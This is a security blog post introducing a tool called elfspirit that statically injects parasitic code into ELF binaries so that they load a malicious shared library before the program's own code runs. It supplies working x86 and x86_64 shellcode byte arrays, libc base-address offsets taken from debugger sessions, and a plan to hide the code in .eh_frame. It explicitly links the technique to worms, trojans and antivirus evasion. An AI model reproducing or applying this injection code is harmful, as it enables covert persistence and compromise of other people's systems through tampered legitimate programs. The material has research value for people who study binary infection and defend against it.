ELF Static Injection to Load Malicious Dynamic Link Library
TL;DR In this blog post, I explain why and how I built a new framework called spirit, with which I was able to load a malicious dynamic link library by injecting parasitic code into an ELF file. You will see the huge difference between this static injection and traditional so hijacking in Linux.
Introduction
As we know, whether it is DLL hijacking on Windows or so hijacking on Linux, the idea is the same: insert code while the program is running so that it loads a dynamic link library (so). This method is called dynamic injection, because the so is injected into a running process. There are many so injection tools, such as ptrace and hookso. These tools must be run by an administrator or by the file owner. In the field of worms, Trojan horses and viruses, or in the field of security protection, we need a technique similar to a patch program that writes malicious code into legitimate programs.
One way is to write the malicious code directly into a specific section of the ELF file, but this is easily detected and intercepted by anti-virus software. The other way is to inject only a small amount of ordinary code that loads a malicious dynamic link library, with all of the logic implemented in the so. This is more subtle than the first method.
Let's start with the definition of static injection:
Parasitic code is injected into an ELF file before it runs, so that the ELF loads a malicious so into its virtual address space.
Although I haven't found existing tools or cases that do exactly this, I believe similar cases or techniques exist in the professional field. Here I just share some independent research and the corresponding code implementation.
Dependencies
We run elfspirit using:
- Ubuntu 20.04 / Kali Linux 2020.4
- gcc 10.2.1
- libc-2.31/2.32
Idea
Modify .eh_frame (of course you can also choose other sections; .eh_frame is a favorite section of malware), write assembly code into it (generally called parasitic code), and load the so with __libc_dlopen_mode, which is provided by libc.
The most basic usage of __libc_dlopen_mode is the same as dlopen.
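#include <dlfcn.h>   /* dlsym, RTLD_LAZY */

/* glibc-internal symbol with no public header, so it is declared by hand. */
extern void *__libc_dlopen_mode(const char *name, int mode);

int main(int argc, char const *argv[])
{
    char lib_name[] = "libpatchdemo.so";
    void *handle = __libc_dlopen_mode(lib_name, RTLD_LAZY);
    if (!handle)
        return 1;   /* library could not be loaded */
    void (*func)(void) = (void (*)(void))dlsym(handle, "hello_world");
    if (func)
        func();
    return 0;
}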
Entry point for ELF file
I believe the first program most programmers write is hello world, and it has only one function, namely main. When we were still students, the teacher told us that the entry point of a program is the main function. But is this really the case?
Here is a good overview of what happens during program startup before main. In particular, it shows that _start is the actual entry point to your program from the OS viewpoint. As a result, _start is the very first address from which the instruction pointer starts executing in the program.
While main is the entry point for your program from a programmer's perspective, _start is the usual entry point from the OS perspective (the first instruction that is executed after your program was started by the OS).
Base Address of Libc
How does the parasitic code know the base address of libc before ELF is running?
This is an interesting question, and the answer may differ between operating systems. Here we conducted experiments on Ubuntu 20.04 and Kali Linux 2020.4.
x86
Before the _start function runs, check the values of all registers and look for values that may be related to the base addresses of libraries such as libc. We found an interesting phenomenon: ebx stores the runtime address of .got.plt in ld-2.31.so.
$ebx : 0xf7ffd000 → 0x0002af3c
gef➤ xinfo 0xf7ffd000
───────── xinfo: 0xf7ffd000 ─────────
Page: 0xf7ffd000 → 0xf7ffe000 (size=0x1000)
Permissions: rw-
Pathname: /usr/lib32/ld-2.31.so
Offset (from page): 0x0
Inode: 3174763
Segment: .got.plt (0xf7ffd000-0xf7ffd028)
Offset (from segment): 0x0
Continue by viewing the contents of .got.plt in the ELF loader.
gef➤ x/dx 0xf7ffd00c
0xf7ffd00c <_dl_catch_exception@got.plt>: 0xf7f084e0
The function _dl_catch_exception() belongs to libc.so:
.text:0013F4E0 public _dl_catch_exception
.text:0013F4E0 _dl_catch_exception proc near ; CODE XREF: sub_13EE00+3D7↑p
.text:0013F4E0 ; _dl_catch_error+2B↑p
Therefore, the base address of libc is the value stored in that .got.plt entry minus the offset of _dl_catch_exception inside libc.so (0x0013F4E0):
mov ecx, DWORD PTR [ebx + 0xc]
sub ecx, 0x0013F4E0
We need to find the offsets of the following symbols in the loader and in libc:
- _dl_catch_exception_got (loader)
- _dl_catch_exception, __libc_dlopen_mode (libc)
The actual debugging results of the assembly code are as follows
x86_64
Using the method from the previous section, we also found a libc-related address in rdx. The address points to the symbol _dl_fini in ld.so.
$rdx : 0x00007ffff7fe21b0 → <_dl_fini+0> push rbp
gef➤ xinfo 0x00007ffff7fe22f0
──────────────────── xinfo: 0x7ffff7fe22f0 ────────────────────
Page: 0x00007ffff7fd3000 → 0x00007ffff7ff3000 (size=0x20000)
Permissions: r-x
Pathname: /usr/lib/x86_64-linux-gnu/ld-2.32.so
Offset (from page): 0xf2f0
Inode: 3151771
Segment: .text (0x00007ffff7fd3050-0x00007ffff7ff2cbe)
Offset (from segment): 0xf2a0
Symbol: _dl_fini
ld-2.32.so
- symbol _dl_fini offset: 0x102f0
- symbol _dl_catch_exception (.got.plt) offset: 0x2B018
libc base address = [rdx + (0x2B018 - 0x102f0)] - 0x137A90, that is:
mov r9, [rdx + _dl_catch_exception_got - _dl_fini]
sub r9, _dl_catch_exception
If you want to go on and call __libc_dlopen_mode, you need to add one more line of assembly code:
add r9, __libc_dlopen_mode
We need to find the offsets of the following symbols in the loader and in libc:
- _dl_fini, _dl_catch_exception_got (loader)
- _dl_catch_exception, __libc_dlopen_mode (libc)
Parasitic Code
All parasitic code must preserve the original register state. The code we insert runs between the loader and the ELF binary's own code, so any register change may cause the program to crash. The safest approach is for the first part of the parasitic code to save the values of all registers and for the last part to restore them.
Here, we briefly analyze which registers can be modified without affecting the subsequent normal operation of the program.
It can be seen from the code of _start that modifying the three registers ebp/esi/ecx will not affect the data flow. _start is linked in automatically by the gcc toolchain (it comes from the C runtime startup object), and its behavior may vary between compilers and toolchains.
$ gcc --version
gcc (Debian 10.2.1-6) 10.2.1 20210110
Copyright (C) 2020 Free Software Foundation, Inc.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Finally, the parasitic code must transfer control to the original entry point so that the program can run normally. Therefore, the offset of the _start function has to be recalculated at the end of the parasitic code, and the corresponding assembly instruction used to reach it.
Can I directly use an instruction like jmp ecx to jump? The answer is no, because the jmp instruction does not have the ability to restore the stack. After the target so has been loaded and execution has jumped to _start, the program still needs to return to the beginning of the program to deinit once the main function has finished.
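Get the value of the ip register
A near call is encoded as the opcode e8 followed by a 32-bit displacement, where EIP is the address of the instruction that follows the call:
|e8|target address - EIP|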
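32bit
call 0x5 ; e8 00 00 00 00: call the next instruction, which pushes its address
pop eax ; eax = eip
64bit
lea rax, [rip] ; rax = address of the next instruction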
32bit
uint8_t sc_x86[] = \
/* start */
"\x55" // push ebp
"\x89\xe5" // mov ebp, esp
"\x83\xec\x28" // sub esp, 28h
"\xc7\x45\xe4\x6c\x69\x62\x70" // mov DWORD PTR [ebp-0x1c],0x7062696c
"\xc7\x45\xe8\x61\x74\x63\x68" // mov DWORD PTR [ebp-0x18],0x68637461
"\xc7\x45\xec\x64\x65\x6d\x6f" // mov DWORD PTR [ebp-0x14],0x6f6d6564
"\xc7\x45\xf0\x2e\x73\x6f\x00" // mov DWORD PTR [ebp-0x10],0x6f732e
"\x6a\x01" // push 0x1
"\x8d\x6d\xe4" // lea ebp, [ebp-0x1c]
"\x55" // push ebp
"\x8b\x4b\x0c" // mov ecx, DWORD PTR [ebx + 0xc]
"\x81\xe9\xe0\xf4\x13\x00" // sub ecx, 0x0013F4E0
"\x81\xc1\xf0\xea\x13\x00" // add ecx, 0x0013EAF0
"\xff\xd1" // call ecx --> <__libc_dlopen_mode@plt>
/* */
"\x83\xc4\x08" // add esp, 0x8
"\xc9" // leave
/* end */
"\xe8" // call <_start> (e8 ** = _start - eip)
"\x00\x00\x00\x00";
64bit
uint8_t sc_x86_64[] = \
/* start */
"\x55" // push rbp
"\x48\x89\xe5" // mov rbp, rsp
"\x48\x83\xec\x30" // sub rsp, 30h
"\x48\xb8\x6c\x69\x62\x70\x61\x74\x63\x68" // movabs rax,0x686374617062696c
"\x48\xbb\x64\x65\x6d\x6f\x2e\x73\x6f\x00" // movabs rbx,0x6f732e6f6d6564
"\x48\x89\x45\xe0" // mov QWORD PTR [rbp-0x20],rax
"\x48\x89\x5d\xe8" // mov QWORD PTR [rbp-0x18],rbx
"\x48\x8d\x45\xe0" // lea rax,[rbp-0x20]
"\xbe\x01\x00\x00\x00" // mov esi,0x1
"\x48\x89\xc7" // mov rdi,rax
"\x4c\x8b\x8a\x68\xae\x01\x00" // mov r9, [rdx + 0x1ae68]
"\x49\x81\xe9\xe0\x81\x13\x00" // sub r9, 0x0000000001381E0
"\x49\x81\xc1\x00\x78\x13\x00" // add r9, 0x000000000137800
"\x41\xff\xd1" // call r9
"\xc9" // leave
/* end */
"\xe8\x0b\x00\x00\x00"; // call <_start>
Further thought
Modifying the ELF entry point and injecting parasitic code is actually easy for some protection programs to detect. We can further optimize the solution in the future, for example by directly modifying the first instruction of the _start function so that it jumps to the parasitic section. The parasitic code then implements the functionality of _start.
elfspirit has integrated all the code involved in this article. Have fun.
Congratulations, @EDG_Edward! #Worlds2021